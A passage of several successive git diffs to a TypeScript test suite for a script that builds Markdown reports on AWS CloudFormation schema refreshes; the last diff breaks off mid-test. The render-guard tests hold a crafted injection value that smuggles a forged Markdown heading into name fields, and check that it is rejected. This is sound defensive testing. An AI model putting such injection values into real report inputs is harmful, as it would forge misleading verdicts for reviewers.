@@ -875,6 +876,89 @@ describe('the render guards, at every site that reaches Markdown', () => {
   });
 });
 
+describe('the property-coverage verdict', () => {
+  it('never renders "additions only" over a coverage check that FAILED', () => {
+    // Its status was discarded by the workflow for six rounds — `|| echo` stops
+    // `set -e` aborting and nothing else — so a red check rendered as clean.
+    // The trigger is a pure schema ADDITION: the test fails when AWS RE-ADDS a
+    // property some provider wrote off in `bogusTolerated`, and 12 such
+    // properties across 10 types are one AWS addition away from it.
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [{ resourceType: 'AWS::Glue::Crawler', properties: ['LineageConfiguration'] }],
+      divergences: [],
+      propertyCoverageFailed: true,
+      skipped: [],
+    });
+    expect(md).not.toContain('additions only');
+    expect(md).toContain('property-coverage check FAILED');
+    expect(md).toContain('bogusTolerated');
+    // The property is still listed, but the section says the listing does not
+    // cover it — it was previously labelled "no decision needed" and posted to
+    // the backfill umbrella as newly unaccounted.
+    expect(md).toContain('NOT covered by');
+  });
+
+  it('renders the clean verdict when the coverage check passed', () => {
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [],
+      propertyCoverageFailed: false,
+      skipped: [],
+    });
+    expect(md).toContain('additions only');
+  });
+});
+
+describe('fixtures the report could not read', () => {
+  it('never renders "additions only" while a fixture went unaccounted', () => {
+    // A type that throws during the comparison vanishes from the removal AND
+    // the addition accounting, so the residue reads as clean rather than as
+    // silent. The other two parsers grew shortfall counters in earlier rounds.
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [],
+      unreadable: ['AWS::Glue::Connection.json'],
+      skipped: [],
+    });
+    expect(md).not.toContain('additions only');
+    expect(md).toContain('could not read');
+    expect(md).toContain('AWS::Glue::Connection');
+  });
+
+  it('says nothing about unreadable fixtures when there are none', () => {
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [],
+      unreadable: [],
+      skipped: [],
+    });
+    expect(md).toContain('additions only');
+    expect(md).not.toContain('could not read');
+  });
+});
+
+describe('the read-only additions section', () => {
+  it('does not promise a read-only addition is always a no-op', () => {
+    // A new read-only `*Arn`/`*Url` on a type that had none fails
+    // `audit:sdk-attr-coverage:check`, and that is reachable ONLY through a
+    // read-only addition — so "nothing to do" was a verdict a blocking critic
+    // contradicts. 92 of the 134 audited types have no Arn attribute today.
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      readOnlyAddedCount: 3,
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).toContain('usually nothing to do');
+    expect(md).toContain('sdk-attr-coverage');
+  });
+});
+
 describe('the unparsed-failure verdict', () => {
   it('never renders "additions only" over a checker that said it failed', () => {
     // Both wrong answers shipped: throwing discarded the whole diagnosis,
@@ -1306,4 +1390,77 @@ describe('the script end to end', () => {
     // not reach it.
     expect(md).not.toContain('Installed vs published');
   }, 60_000);
+});
+
+describe('collectFixtureDeltas', () => {
+  const base = {
+    providerFiles: new Map([['AWS::Glue::Connection', 'src/provisioning/providers/glue-provider.ts']]),
+    declared: new Map([['AWS::Glue::Connection', new Set(['OldProp'])]]),
+    declarationCandidates: () => [],
+    sdkEvidence: () => undefined,
+  };
+  // The REAL fixture shape, checked against `tests/fixtures/cfn-schemas/`:
+  // `properties` is an array of bare names and `readOnlyProperties` likewise.
+  // The first draft of this helper used an object map and `/properties/X`
+  // paths, and every case reported an empty delta — a fixture that does not
+  // encode what its consumer reads proves nothing about the consumer.
+  const fixture = (props: string[], readOnly: string[] = []) =>
+    JSON.stringify({
+      resourceType: 'AWS::Glue::Connection',
+      properties: props,
+      readOnlyProperties: readOnly,
+    });
+
+  it('COUNTS a fixture whose comparison threw, rather than skipping it', () => {
+    // The branch that could be deleted with the whole suite green. A type that
+    // throws vanishes from the removal AND the addition accounting at once, so
+    // the residue reads as "additions only" rather than as silent — and the
+    // renderer, which IS pinned, never sees that it happened.
+    const out = collectFixtureDeltas({
+      ...base,
+      files: ['broken.json'],
+      committedOf: () => '{ not json',
+      currentOf: () => fixture(['A']),
+    });
+    expect(out.unreadable).toEqual(['broken.json']);
+    expect(out.removed).toEqual([]);
+    expect(out.writableAdded).toEqual([]);
+  });
+
+  it('skips a BRAND-NEW fixture silently, which is not the same thing', () => {
+    // No committed side means nothing to compare, not something unreadable —
+    // counting it would put every newly captured type in the warning list.
+    const out = collectFixtureDeltas({
+      ...base,
+      files: ['new.json'],
+      committedOf: () => undefined,
+      currentOf: () => fixture(['A']),
+    });
+    expect(out.unreadable).toEqual([]);
+    expect(out.writableAdded).toEqual([]);
+  });
+
+  it('reports a removal only when the provider DECLARES the property', () => {
+    const out = collectFixtureDeltas({
+      ...base,
+      files: ['glue.json'],
+      committedOf: () => fixture(['OldProp', 'Undeclared']),
+      currentOf: () => fixture([]),
+    });
+    expect(out.removed).toHaveLength(1);
+    expect(out.removed[0]!.properties).toEqual(['OldProp']);
+  });
+
+  it('splits an addition by whether it is settable', () => {
+    const out = collectFixtureDeltas({
+      ...base,
+      files: ['glue.json'],
+      committedOf: () => fixture([]),
+      currentOf: () => fixture(['Settable', 'ComputedArn'], ['ComputedArn']),
+    });
+    expect(out.writableAdded).toEqual([
+      { resourceType: 'AWS::Glue::Connection', properties: ['Settable'] },
+    ]);
+    expect(out.readOnlyAddedCount).toBe(1);
+  });
 });

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -42,6 +42,7 @@ import {
   renderLiteral,
   buildSdkLag,
   CHECK_GUIDANCE,
+  KNOWN_FLAGS,
   classifyGitShowFailure,
   collectFixtureDeltas,
   loadDeclaredProperties,
@@ -1591,8 +1592,11 @@ describe('the script end to end', () => {
       '--failed-checks',
       '-property-coverage',
     ]);
-    expect(md).toContain('was given with no value');
-    expect(md).not.toContain('-property-coverage');
+    // Refused — by the unknown-flag guard, which sees the token first and names
+    // it. Before either guard existed this fabricated a check rendered as
+    // `#### \`-property-coverage\``.
+    expect(md).toContain('unrecognized flag');
+    expect(md).not.toContain('#### ');
   }, 60_000);
 
   it('refuses a dash-leading value in the GLUED spelling too', () => {
@@ -1606,6 +1610,15 @@ describe('the script end to end', () => {
       expect(md, `accepted ${spelling}`).toContain('was given with no value');
       expect(md).not.toContain('no guidance');
     }
+    // The SPACE form now trips the unknown-flag guard first, which is the
+    // stronger refusal — it names the offending token rather than the flag
+    // that swallowed it. Either refusal is correct; neither may render clean.
+    const spaced = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+      '--failed-checks',
+      '-property-coverage',
+    ]);
+    expect(spaced).toContain('unrecognized flag');
+    expect(spaced).not.toContain('no guidance');
   }, 60_000);
 
   it('does not answer a check name inherited from Object.prototype', () => {
@@ -1631,6 +1644,27 @@ describe('the script end to end', () => {
       tmpdir(),
     ]);
     expect(md).toContain('which is a directory');
+  }, 60_000);
+
+  it('refuses an unrecognised flag instead of rendering a clean verdict', () => {
+    // Every reader's absent-flag arm is the permissive one, so a typo, a
+    // retired flag and a single-dash spelling all rendered as clean.
+    for (const bad of ['--property-coverage-rc', '--failed-check', '-failed-checks']) {
+      const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [bad, 'x']);
+      expect(md, `accepted ${bad}`).toContain('unrecognized flag');
+      expect(md).not.toContain('Nothing in this refresh needs a decision');
+    }
+  }, 60_000);
+
+  it('accepts every flag it documents, in both spellings', () => {
+    // The inverse: a guard that refused a REAL flag would be caught here
+    // rather than in the workflow.
+    const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+      '--failed-checks=property-coverage',
+      '--skipped-log',
+      '/dev/null',
+    ]);
+    expect(md).not.toContain('unrecognized flag');
   }, 60_000);
 
   it('renders a case-divergence without asking npm anything', () => {
@@ -1885,4 +1919,40 @@ describe('the module\u2019s own doc comments', () => {
     // file it never parsed.
     expect(lines.filter((l) => l === ' */').length).toBeGreaterThan(20);
   });
+});
+
+describe('the script\u2019s own synopsis', () => {
+  const SRC = readFileSync(join(REPO_ROOT, 'scripts/diagnose-schema-refresh.mjs'), 'utf8');
+  const header = SRC.slice(0, SRC.indexOf(' */'));
+
+  it('documents exactly the flags it accepts', () => {
+    // It documented `--property-coverage-rc` for two rounds after
+    // `--failed-checks` replaced it, and named `--failed-checks` nowhere — so
+    // following the script's OWN usage produced "additions only" over a red
+    // check, the verdict six rounds went into closing, reached through the
+    // documentation. Both directions, so a new flag cannot ship undocumented
+    // and a retired one cannot linger.
+    const documented = [...header.matchAll(/`?(--[a-z][a-z-]*)`?/g)].map((m) => m[1]!);
+    expect(new Set(documented), 'the synopsis and the accepted set disagree').toEqual(
+      new Set(KNOWN_FLAGS)
+    );
+  });
+
+  it('has a synopsis that would actually paste', () => {
+    // Line 39 ended `\\`, which terminates the command in bash and passes a
+    // literal backslash — the same class the guidance's command block is
+    // fenced for, one file over and unfenced.
+    const lines = header.split('\n');
+    const start = lines.findIndex((l) => l.includes('node scripts/diagnose-schema-refresh.mjs'));
+    expect(start, 'the synopsis no longer shows the invocation').toBeGreaterThan(-1);
+    for (let i = start; i < lines.length; i++) {
+      const body = lines[i]!.replace(/^\s*\*\s?/, '');
+      if (body.trim() === '') break;
+      const continues = body.endsWith('\\');
+      if (continues) {
+        expect(body.endsWith('\\\\'), `line ${i + 1} ends in a DOUBLED backslash`).toBe(false);
+      }
+    }
+  });
+
 });

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -24,7 +24,9 @@
  * makes.
  */
 import { describe, it, expect } from 'vite-plus/test';
-import { readFileSync } from 'node:fs';
+import { execFileSync } from 'node:child_process';
+import { mkdtempSync, readFileSync, writeFileSync } from 'node:fs';
+import { tmpdir } from 'node:os';
 import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
 import {
@@ -38,6 +40,7 @@ import {
   renderDetail,
   renderKey,
   renderLiteral,
+  buildSdkLag,
   clientsForType,
   sdkClientVersions,
   renderDiagnosis,
@@ -123,6 +126,35 @@ describe('parseNestedKeyDivergences', () => {
     }
   });
 
+  it('flags a PARTIAL parse, not only a total one', () => {
+    // The same correction `parseDeclaredProperties` needed one round earlier,
+    // in the sibling parser: gated on `length === 0`, a producer change
+    // touching SOME lines dropped them and the report rendered the survivors
+    // with no warning. Two of these five parse strictly; three do not.
+    const out = parseNestedKeyDivergences(
+      [
+        'nested-key-coverage: FAIL — nested CFn->SDK key divergence(s) detected.',
+        '  AWS::ECS::Service: someKey [case-divergence]',
+        '  AWS::Glue::Connection: OAuth2Props [no-sdk-member]',
+        '  AWS::S3::Bucket: a key with spaces [no-sdk-member]',
+        '  AWS::S3::Bucket: Some.Key [newBucket]',
+        '  AWS::S3::Bucket: Other.Key [no-sdk-member] (detail).',
+      ].join('\n')
+    );
+    expect(out.divergences.length).toBe(2);
+    expect(out.unparsedFailure, 'three findings were dropped silently').toBe(true);
+  });
+
+  it('flags a checker that failed with NO announcement at all, via its exit code', () => {
+    // An empty log, a `task not found` and an OOM kill carry nothing to grep
+    // for, and all three rendered "additions only" over a checker that never
+    // ran. The status is the other half of the question.
+    for (const output of ['', 'error: task "audit:nested-key-coverage:check" not found\n']) {
+      expect(parseNestedKeyDivergences(output, 1).unparsedFailure, `rc=1: ${output}`).toBe(true);
+      expect(parseNestedKeyDivergences(output, 0).unparsedFailure, `rc=0: ${output}`).toBe(false);
+    }
+  });
+
   it('does not flag a failure when it DID read findings out of one', () => {
     const out = parseNestedKeyDivergences(
       'nested-key-coverage: FAIL — nested CFn->SDK key divergence(s) detected.\n' +
@@ -191,6 +223,27 @@ describe('parseDeclaredProperties', () => {
     // member emptied all 134 sets with no refusal at all, which filters every
     // removal away and renders "nothing needs a decision" over a red check.
     const mutated = readFileSync(REAL_GENERATED, 'utf8').replaceAll('handled:', 'handledProps:');
+    expect(() => parseDeclaredProperties(mutated)).toThrow(/recognised the declaration shape/);
+  });
+
+  it('REFUSES a PARTIAL shortfall, not only a total collapse', () => {
+    // The motivating measurement was partial — 131 of 134 parsed, three
+    // swallowed and two credited with a neighbour's properties — and a guard
+    // reading `recognised === 0` covers none of that while passing the
+    // total-collapse case above. One entry is enough to refuse.
+    const real = readFileSync(REAL_GENERATED, 'utf8');
+    // Inside an ENTRY, not the first occurrence in the file: the module has 135
+    // `handled:` occurrences and 134 entries, because the type declaration
+    // carries one too. Renaming that one changes no entry, and this case failed
+    // green-side until it did — the same off-by-one the parser itself has to
+    // get right.
+    const firstEntry = real.search(/\[\s*'AWS::[\w:]+',\s*\{/);
+    expect(firstEntry, 'no type entry found').toBeGreaterThan(-1);
+    const at = real.indexOf('handled:', firstEntry);
+    expect(at, 'the generated module no longer uses this shape').toBeGreaterThan(-1);
+    const mutated = real.slice(0, at) + 'handledProps:' + real.slice(at + 'handled:'.length);
+    // Still overwhelmingly parseable — this is not a collapse.
+    expect(parseDeclaredProperties(real).size).toBeGreaterThan(100);
     expect(() => parseDeclaredProperties(mutated)).toThrow(/recognised the declaration shape/);
   });
 
@@ -394,6 +447,12 @@ describe('pairRenames', () => {
     expect(pairRenames('GeoProximityLocation', ['GeoProximityLocationV2'])).toEqual([
       'GeoProximityLocationV2',
     ]);
+  });
+
+  it('refuses an empty name rather than pairing it with everything', () => {
+    // `''.endsWith('')` is true, so an empty needle matched every addition and
+    // would have claimed each one a rename of a nameless property.
+    expect(pairRenames('', ['Alpha', 'Beta'])).toEqual([]);
   });
 
   it('does NOT pair an unrelated addition', () => {
@@ -708,33 +767,53 @@ describe('the render guards, at every site that reaches Markdown', () => {
   // the rejections, so a reverted site is a failing count rather than a case
   // nobody wrote.
   const POISON = 'Foo`\n\n## Nothing in this refresh needs a decision';
+  // `resourceType` reaches Markdown in four more places, and main() takes it
+  // verbatim from the fixture the bundle wrote.
+  const POISON_TYPE = 'AWS::X::Y`\n\n## Nothing in this refresh needs a decision';
 
   it('rejects a hostile name in every position a bundle-derived name reaches', () => {
     const md = renderDiagnosis({
       removed: [
         {
-          resourceType: 'AWS::Glue::Connection',
+          resourceType: POISON_TYPE,
           properties: [POISON],
           candidates: { [POISON]: [] },
           renameCandidates: { [POISON]: [POISON] },
           providerPath: 'src/provisioning/providers/glue-provider.ts',
         },
       ],
-      writableAdded: [{ resourceType: 'AWS::Glue::Connection', properties: [POISON] }],
+      writableAdded: [{ resourceType: POISON_TYPE, properties: [POISON] }],
       divergences: [
         {
-          resourceType: 'AWS::Glue::Connection',
+          resourceType: POISON_TYPE,
           nestedKey: POISON,
           bucket: 'no-sdk-member',
           detail: '',
         },
       ],
       skipped: [POISON],
+      sdkLag: [
+        {
+          resourceType: POISON_TYPE,
+          client: '@aws-sdk/client-glue',
+          installed: '3.0.0',
+          latest: '3.1.0',
+          behind: true,
+        },
+      ],
     });
-    // The removal bullet, the rename bullet, the writable-added bullet, the
-    // divergence line and the skipped list: five sites, five rejections.
+    // Every position, both halves. The `resourceType` positions were fed a
+    // CLEAN value at first, so three of them could be reverted to raw
+    // interpolation individually with the count still 5 — and `resourceType` is
+    // the one main() reads straight out of the fixture (`JSON.parse(committed)
+    // .resourceType ?? file`), unconstrained.
+    //
+    // Sites, in render order: the removal's type heading and its property
+    // bullet, the rename bullet, the divergence line's type and its key, the
+    // writable-added type and its property list, the lag row's type, and the
+    // skipped list.
     const rejections = (md.match(/\[(?:name|key) rejected: unexpected characters\]/g) ?? []).length;
-    expect(rejections, 'a call site is interpolating a bundle-derived name raw').toBe(5);
+    expect(rejections, 'a call site is interpolating a bundle-derived name raw').toBe(9);
     // And the forged heading never renders as one.
     expect(md).not.toMatch(/^## Nothing in this refresh needs a decision$/m);
   });
@@ -818,11 +897,17 @@ describe('sdkClientVersions', () => {
     // The lag question has no member to look up, and asking `sdkModelsMember`
     // with a name that matches nothing answered with the provider's FIRST
     // import — right only by coincidence.
-    const rows = sdkClientVersions(
-      'src/provisioning/providers/route53-provider.ts',
-      REPO_ROOT
-    );
-    expect(rows.length).toBeGreaterThan(0);
+    // `asg-provider.ts`, not a single-client provider: it imports
+    // `@aws-sdk/client-auto-scaling` and `@aws-sdk/client-ec2` at DIFFERENT
+    // installed versions. With one row in hand a mispairing is unobservable —
+    // pinning `version` to `rows[0]`'s left this green against
+    // `route53-provider.ts`.
+    const rows = sdkClientVersions('src/provisioning/providers/asg-provider.ts', REPO_ROOT);
+    expect(rows.length, 'asg-provider no longer imports two clients').toBeGreaterThan(1);
+    expect(
+      new Set(rows.map((r) => r.version)).size,
+      'the two clients now share a version — this case can no longer see a mispairing'
+    ).toBeGreaterThan(1);
     for (const { client, version } of rows) {
       expect(client).toMatch(/^@aws-sdk\/client-/);
       const onDisk = JSON.parse(
@@ -869,6 +954,44 @@ describe('the SDK-lag section', () => {
     expect(md).toContain('UNKNOWN, not ruled out');
   });
 
+  it('keeps the UNKNOWN caveat when EVERY lookup failed', () => {
+    // npm unreachable from CI is the ordinary way that happens, and gating the
+    // whole block on having rows made the report go silent about SDK lag
+    // exactly when it knew least — which reads as ruled out.
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [divergence],
+      skipped: [],
+      sdkLag: [],
+    });
+    expect(md).toContain('Nothing could be read');
+    expect(md).toContain('UNKNOWN, not ruled out');
+  });
+
+  it('does not attribute a lag verdict to a client that is not the type’s own', () => {
+    // `clientsForType` falls back to every imported client when none matches,
+    // so a row can name `@aws-sdk/client-sts` for a Logs divergence. Saying
+    // "ruled out here" over it claims something about the wrong service.
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [{ ...divergence, resourceType: 'AWS::Logs::LogGroup' }],
+      skipped: [],
+      sdkLag: [
+        {
+          resourceType: 'AWS::Logs::LogGroup',
+          client: '@aws-sdk/client-sts',
+          installed: '3.0.0',
+          latest: '3.0.0',
+          behind: false,
+        },
+      ],
+    });
+    expect(md).toContain("not the type's own");
+    expect(md).not.toContain('ruled out here');
+  });
+
   it('rejects a version string that is not one', () => {
     // The anchor is the whole guard: without `$`, `npm view` output carrying a
     // trailing line would be reported as the published version.
@@ -897,9 +1020,26 @@ describe('clientsForType', () => {
     ]);
   });
 
-  it('matches a service whose client name drops the separators', () => {
-    const apigw = [{ client: '@aws-sdk/client-apigatewayv2', version: '3.1.0' }];
-    expect(clientsForType('AWS::ApiGatewayV2::Stage', apigw)).toEqual(apigw);
+  it('matches a service whose client name carries SEPARATORS the type does not', () => {
+    // `@aws-sdk/client-apigatewayv2` was the first pick here and it has no
+    // separator, so deleting the separator strip left this green — the
+    // fallback-to-every-row arm returned the same single-element array the
+    // match arm would have. Two REAL pairs, and a second row that only the
+    // match arm can exclude.
+    const separated = [
+      { client: '@aws-sdk/client-ec2', version: '3.1018.0' },
+      { client: '@aws-sdk/client-auto-scaling', version: '3.1045.0' },
+    ];
+    expect(clientsForType('AWS::AutoScaling::AutoScalingGroup', separated)).toEqual([
+      { client: '@aws-sdk/client-auto-scaling', version: '3.1045.0' },
+    ]);
+    const route53 = [
+      { client: '@aws-sdk/client-sts', version: '3.0.0' },
+      { client: '@aws-sdk/client-route-53', version: '3.1.0' },
+    ];
+    expect(clientsForType('AWS::Route53::HostedZone', route53)).toEqual([
+      { client: '@aws-sdk/client-route-53', version: '3.1.0' },
+    ]);
   });
 
   it('falls back to EVERY row rather than to none when nothing matches', () => {
@@ -909,4 +1049,111 @@ describe('clientsForType', () => {
     expect(clientsForType('AWS::Made::Up', rows)).toEqual(rows);
     expect(clientsForType('', rows)).toEqual(rows);
   });
+});
+
+describe('buildSdkLag', () => {
+  const glue = { resourceType: 'AWS::Glue::Connection', bucket: 'no-sdk-member' };
+  const clientsFor = () => [
+    { client: '@aws-sdk/client-sts', version: '3.0.0' },
+    { client: '@aws-sdk/client-glue', version: '3.1.0' },
+  ];
+  const lag = (client: string, installed: string) => ({
+    installed,
+    latest: '9.9.9',
+    behind: true,
+  });
+
+  it('narrows to the type’s own client, so an unrelated import is not reported', () => {
+    expect(buildSdkLag([glue], clientsFor, lag)).toEqual([
+      {
+        resourceType: 'AWS::Glue::Connection',
+        client: '@aws-sdk/client-glue',
+        installed: '3.1.0',
+        latest: '9.9.9',
+        behind: true,
+      },
+    ]);
+  });
+
+  it('emits ONE row per (type, client) however many divergences land on it', () => {
+    // Several divergences on one type is the ordinary case, and a repeated row
+    // reads as several findings.
+    expect(buildSdkLag([glue, glue, glue], clientsFor, lag)).toHaveLength(1);
+  });
+
+  it('asks each client at most once', () => {
+    const asked: string[] = [];
+    buildSdkLag(
+      [glue, { resourceType: 'AWS::Glue::Crawler', bucket: 'no-sdk-member' }],
+      clientsFor,
+      (client, installed) => {
+        asked.push(client);
+        return { installed, latest: '9.9.9', behind: true };
+      }
+    );
+    // `npm view` is a network call; two types sharing a client must not pay twice.
+    expect(asked).toEqual(['@aws-sdk/client-glue']);
+  });
+
+  it('never asks anything for a case-divergence', () => {
+    const asked: string[] = [];
+    const rows = buildSdkLag(
+      [{ resourceType: 'AWS::ECS::Service', bucket: 'case-divergence' }],
+      clientsFor,
+      (client, installed) => {
+        asked.push(client);
+        return { installed, latest: '9.9.9', behind: true };
+      }
+    );
+    // There is no judgement in a case divergence, so it justifies no lookup.
+    expect(asked).toEqual([]);
+    expect(rows).toEqual([]);
+  });
+
+  it('drops a client whose lag could not be read, rather than inventing a row', () => {
+    expect(buildSdkLag([glue], clientsFor, () => undefined)).toEqual([]);
+  });
+});
+
+describe('the script end to end', () => {
+  // `main()` had no coverage at all, and the two defects review found in the
+  // lag path were both reachable only through it. These spawn the real binary
+  // against the real repo. Neither log carries a non-case divergence, so no
+  // `npm view` runs and the cases stay offline.
+  const SCRIPT = join(REPO_ROOT, 'scripts/diagnose-schema-refresh.mjs');
+  const run = (log: string): string => {
+    const dir = mkdtempSync(join(tmpdir(), 'cdkd-diagnose-'));
+    const path = join(dir, 'nested-key.log');
+    writeFileSync(path, log);
+    return execFileSync('node', [SCRIPT, '--nested-key-log', path], { encoding: 'utf8' });
+  };
+
+  it('reports a clean refresh as clean', () => {
+    const md = run('nested-key-coverage: OK — 0 divergences\n');
+    expect(md).toContain('Nothing in this refresh needs a decision');
+  }, 60_000);
+
+  it('carries an unreadable checker failure all the way to the body', () => {
+    // The wiring from `parseNestedKeyDivergences`'s flag to the rendered
+    // section is one line in main(), and it was the sole production path of the
+    // whole feature.
+    const md = run(
+      'nested-key-coverage: FAIL — stale NESTED_KEY_ALLOW_LIST entr(ies) match no audited key\n'
+    );
+    expect(md).toContain('FAILED in a mode this report cannot read');
+    expect(md).not.toContain('Nothing in this refresh needs a decision — additions only');
+  }, 60_000);
+
+  it('renders a case-divergence without asking npm anything', () => {
+    const md = run(
+      'nested-key-coverage: FAIL — nested CFn->SDK key divergence(s) detected.\n' +
+        '  AWS::ECS::Service: someKey [case-divergence] (SDK models `SomeKey`)\n'
+    );
+    expect(md).toContain('AWS::ECS::Service');
+    expect(md).toContain('someKey');
+    expect(md).toContain('case-divergence');
+    // The lag section is the network-touching one and a case divergence must
+    // not reach it.
+    expect(md).not.toContain('Installed vs published');
+  }, 60_000);
 });

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -25,7 +25,7 @@
  */
 import { describe, it, expect } from 'vite-plus/test';
 import { execFileSync } from 'node:child_process';
-import { mkdtempSync, readFileSync, rmSync, writeFileSync } from 'node:fs';
+import { mkdtempSync, readFileSync, readdirSync, rmSync, writeFileSync } from 'node:fs';
 import { tmpdir } from 'node:os';
 import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
@@ -41,7 +41,10 @@ import {
   renderKey,
   renderLiteral,
   buildSdkLag,
+  CHECK_GUIDANCE,
   collectFixtureDeltas,
+  loadDeclaredProperties,
+  UNREADABLE,
   clientsForType,
   sdkClientVersions,
   renderDiagnosis,
@@ -255,6 +258,25 @@ describe('parseDeclaredProperties', () => {
     const declared = parseDeclaredProperties(readFileSync(REAL_GENERATED, 'utf8'));
     const empties = [...declared.values()].filter((set) => set.size === 0).length;
     expect(empties, 'no empty-set entry left — this case no longer covers that shape').toBeGreaterThan(0);
+  });
+
+  it('REFUSES a MISSING module rather than reading it as an empty one', () => {
+    // `parseDeclaredProperties('')` legitimately returns an empty map, so the
+    // caller's absent-file-to-`''` conversion made a missing module mean "no
+    // provider declares anything" — which filters every removal away and
+    // renders the clean verdict.
+    const dir = mkdtempSync(join(tmpdir(), 'cdkd-noroot-'));
+    try {
+      expect(() => loadDeclaredProperties(dir)).toThrow(/is missing/);
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  });
+
+  it('loads the real module through the same path main() uses', () => {
+    // Otherwise the refusal above is the only thing exercised, and a broken
+    // read would look like a passing refusal test.
+    expect(loadDeclaredProperties().size).toBeGreaterThan(100);
   });
 
   it('returns an empty map for genuinely empty input, without throwing', () => {
@@ -791,9 +813,14 @@ describe('the render guards, at every site that reaches Markdown', () => {
           resourceType: POISON_TYPE,
           nestedKey: POISON,
           bucket: 'no-sdk-member',
-          detail: '',
+          // Non-empty: an empty detail short-circuits the ternary, so the
+          // `renderDetail` CALL SITE could be reverted with the count intact.
+          detail: 'SDK has `X`',
         },
       ],
+      // The unreadable section renders a name too, and adding a render site the
+      // poison input cannot reach defeats this case's stated job.
+      unreadable: ['AWS-X-Y`\n\n## Nothing in this refresh needs a decision.json'],
       skipped: [POISON],
       sdkLag: [
         {
@@ -829,7 +856,11 @@ describe('the render guards, at every site that reaches Markdown', () => {
     // writable-added type and its property list, the lag row's type, and the
     // skipped list.
     const rejections = (md.match(/\[(?:name|key) rejected: unexpected characters\]/g) ?? []).length;
-    expect(rejections, 'a call site is interpolating a bundle-derived name raw').toBe(10);
+    expect(rejections, 'a call site is interpolating a bundle-derived name raw').toBe(11);
+    // `renderDetail` strips rather than rejects, so it needs its own witness:
+    // the backtick it removes cannot appear in the rendered detail.
+    expect(md, 'renderDetail was bypassed at its call site').not.toContain('SDK has `X`');
+    expect(md).toContain('SDK has X');
     // And the forged heading never renders as one.
     expect(md).not.toMatch(/^## Nothing in this refresh needs a decision$/m);
   });
@@ -876,7 +907,39 @@ describe('the render guards, at every site that reaches Markdown', () => {
   });
 });
 
-describe('the property-coverage verdict', () => {
+describe('the failed-checks verdict', () => {
+  it('names EVERY failed check, not just the one that was noticed first', () => {
+    // A list rather than a flag per check: `property-coverage`'s red was
+    // discarded for six rounds, and closing that left `sdk-attr-coverage` and
+    // `enrichment-coverage` — both fixture-driven, both CI-blocking, both
+    // reddened by a pure schema ADDITION — reporting nothing at all.
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      readOnlyAddedCount: 2,
+      divergences: [],
+      failedChecks: ['audit:sdk-attr-coverage:check', 'audit:enrichment-coverage:check'],
+      skipped: [],
+    });
+    expect(md).not.toContain('additions only');
+    expect(md).toContain('audit:sdk-attr-coverage:check');
+    expect(md).toContain('audit:enrichment-coverage:check');
+    expect(md).toContain('enrichResourceAttributes');
+  });
+
+  it('names a check it has no guidance for rather than staying silent', () => {
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [],
+      failedChecks: ['audit:something:check'],
+      skipped: [],
+    });
+    expect(md).not.toContain('additions only');
+    expect(md).toContain('audit:something:check');
+    expect(md).toContain('no guidance');
+  });
+
   it('never renders "additions only" over a coverage check that FAILED', () => {
     // Its status was discarded by the workflow for six rounds — `|| echo` stops
     // `set -e` aborting and nothing else — so a red check rendered as clean.
@@ -887,11 +950,11 @@ describe('the property-coverage verdict', () => {
       removed: [],
       writableAdded: [{ resourceType: 'AWS::Glue::Crawler', properties: ['LineageConfiguration'] }],
       divergences: [],
-      propertyCoverageFailed: true,
+      failedChecks: ['property-coverage'],
       skipped: [],
     });
     expect(md).not.toContain('additions only');
-    expect(md).toContain('property-coverage check FAILED');
+    expect(md).toContain('property-coverage');
     expect(md).toContain('bogusTolerated');
     // The property is still listed, but the section says the listing does not
     // cover it — it was previously labelled "no decision needed" and posted to
@@ -904,7 +967,7 @@ describe('the property-coverage verdict', () => {
       removed: [],
       writableAdded: [],
       divergences: [],
-      propertyCoverageFailed: false,
+      failedChecks: [],
       skipped: [],
     });
     expect(md).toContain('additions only');
@@ -915,17 +978,45 @@ describe('fixtures the report could not read', () => {
   it('never renders "additions only" while a fixture went unaccounted', () => {
     // A type that throws during the comparison vanishes from the removal AND
     // the addition accounting, so the residue reads as clean rather than as
-    // silent. The other two parsers grew shortfall counters in earlier rounds.
+    // silent. The other parsers grew shortfall counters in earlier rounds.
+    //
+    // The FILENAME shape is load-bearing and this case had it wrong: the
+    // refresh writes `AWS::Glue::Connection` as `AWS-Glue-Connection.json`, and
+    // `renderName`'s class excludes `-`, so the first version of this section
+    // put all 134 possible names through the rejection placeholder — while this
+    // case fed a name the directory can never hold and passed.
     const md = renderDiagnosis({
       removed: [],
       writableAdded: [],
       divergences: [],
-      unreadable: ['AWS::Glue::Connection.json'],
+      unreadable: ['AWS-Glue-Connection.json'],
       skipped: [],
     });
     expect(md).not.toContain('additions only');
     expect(md).toContain('could not read');
     expect(md).toContain('AWS::Glue::Connection');
+    expect(md, 'the filename went through the guard unconverted').not.toContain('rejected');
+  });
+
+  it('renders the real directory’s filenames, not a hand-written shape', () => {
+    // Anchored on the actual directory rather than on a literal: a rename in
+    // `refresh-cfn-schemas.mjs` would otherwise leave this passing while every
+    // rendered name became a placeholder.
+    const files = readdirSync(join(REPO_ROOT, 'tests/fixtures/cfn-schemas'))
+      .filter((f) => f.endsWith('.json') && !f.startsWith('_'))
+      .slice(0, 5);
+    expect(files.length, 'no fixtures found — this case checks nothing').toBe(5);
+    const md = renderDiagnosis({
+      removed: [],
